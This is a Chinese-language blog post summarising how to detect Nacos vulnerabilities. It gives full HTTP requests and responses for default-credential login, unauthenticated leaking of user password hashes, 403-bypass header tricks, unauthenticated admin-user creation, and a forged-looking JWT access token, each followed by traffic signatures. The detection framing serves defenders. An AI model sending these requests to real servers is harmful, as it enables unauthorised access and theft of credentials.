Nacos漏洞检测总结

news2024/11/29 2:45:20

弱口令

默认账号密码

nacos/nacos

POST /nacos/v1/auth/users/login HTTP/1.1
Host: xxxx:8848
Connection: keep-alive
Content-Length: 29
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

username=nacos&password=nacos
 响应
HTTP/1.1 200
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Set-Cookie: JSESSIONID=4C62C4A3A461080B84B1D4C93AD5FE56; Path=/nacos; HttpOnly
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcyNDA2NTkzNX0.lmLasuSrTflLJmiAuDvzy-QVN9LNNJKne7Nx4RYSo7c
Content-Type: application/json
Transfer-Encoding: chunked
Date: Mon, 19 Aug 2024 06:12:15 GMT
Keep-Alive: timeout=60
Connection: keep-alive

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcyNDA2NTkzNX0.lmLasuSrTflLJmiAuDvzy-QVN9LNNJKne7Nx4RYSo7c","tokenTtl":18000,"globalAdmin":true,"username":"nacos"}

特征

1、接口为 v1/auth/users/login、存在username和password、默认端口为8848

2、登入成功特征状态码为200、响应体包含Set-Cookie和accessToken

未授权账号密码泄露

直接访问/nacos/v1/auth/users/?pageNo=1&pageSize=999

请求
GET /nacos/v1/auth/users/?pageNo=1&pageSize=999 HTTP/1.1
Host: xxxx:8848
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
 响应
HTTP/1.1 200
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Type: application/json
Transfer-Encoding: chunked
Date: Sun, 18 Aug 2024 13:39:39 GMT
Keep-Alive: timeout=60
Connection: keep-alive

{"totalCount":2,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"},{"username":"Emo","password":"$2a$10$VwnJ2n1Ma5fUu2f4KmVMLON8eiDkjBcwA96FSeCkG0xljkYCyqkuG"}]}

如果响应为403、或者不成功可尝试

1、修改user-agent头为Nacos-Server进行绕过 (nacos漏洞遇到403均可尝试)

2、增加请求头serverIdentity: security

特征

1、泄露成功响应体会返回pageItems列表、其中账号密码包含在里面

2、加盐密码前缀为$2a$10$

未授权添加用户

ip:8848/nacos/v1/auth/users?username=root&password=root

POST /nacos/v1/auth/users? HTTP/1.1
Host: ip:8848
Connection: keep-alive
Content-Length: 32
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9




REQUEST BODY:
username=root&password=12345678

#########################################################################################


HTTP/1.1 200 
Content-Type: application/json;charset=UTF-8
Transfer-Encoding: chunked
Date: Tue, 20 Aug 2024 03:40:55 GMT
Keep-Alive: timeout=60
Connection: keep-alive




{"code":200,"message":null,"data":"create user ok!"}

或者将账号密码放入url中

POST /nacos/v1/auth/users/?username=root&password=root HTTP/1.1
Host: ip:8848
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Length: 0



REQUEST BODY:
-

#########################################################################################


HTTP/1.1 200 
Content-Type: application/json;charset=UTF-8
Transfer-Encoding: chunked
Date: Thu, 15 Aug 2024 12:22:43 GMT
Keep-Alive: timeout=60
Connection: keep-alive




{"code":200,"message":null,"data":"create user ok!"}

也存在create user ok的值是在message中不在data中的情况，这个可能是版本问题

POST /nacos/v1/auth/users HTTP/1.1
Host: ip:8848
Content-Length: 31
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: ip:8848
Referer: ip1:8848/nacos/
Accept-Encoding: gzip, deflate
Connection: close



username=admin&password=admin

#########################################################################################

RESPONSE HEAD:
HTTP/1.1 200 
Content-Type: application/json;charset=UTF-8
Transfer-Encoding: chunked
Date: Wed, 14 Aug 2024 09:54:33 GMT
Connection: close


RESPONSE BODY:
{"code":200,"message":"create user ok!","data":null}

正常业务创建账号会带有cookie、token等认证信息

POST /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q HTTP/1.1
Host: ip:8848
Content-Length: 31
Accept: application/json, text/plain, */*
accessToken: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin:ip:8848
Referer: ip:8848/nacos/
Accept-Encoding: gzip, deflate
Connection: close


username=admin&password=admin1

#########################################################################################

HTTP/1.1 200 
Content-Type: application/json;charset=UTF-8
Transfer-Encoding: chunked
Date: Wed, 14 Aug 2024 09:54:33 GMT
Connection: close



{"code":200,"message":"create user ok!","data":null}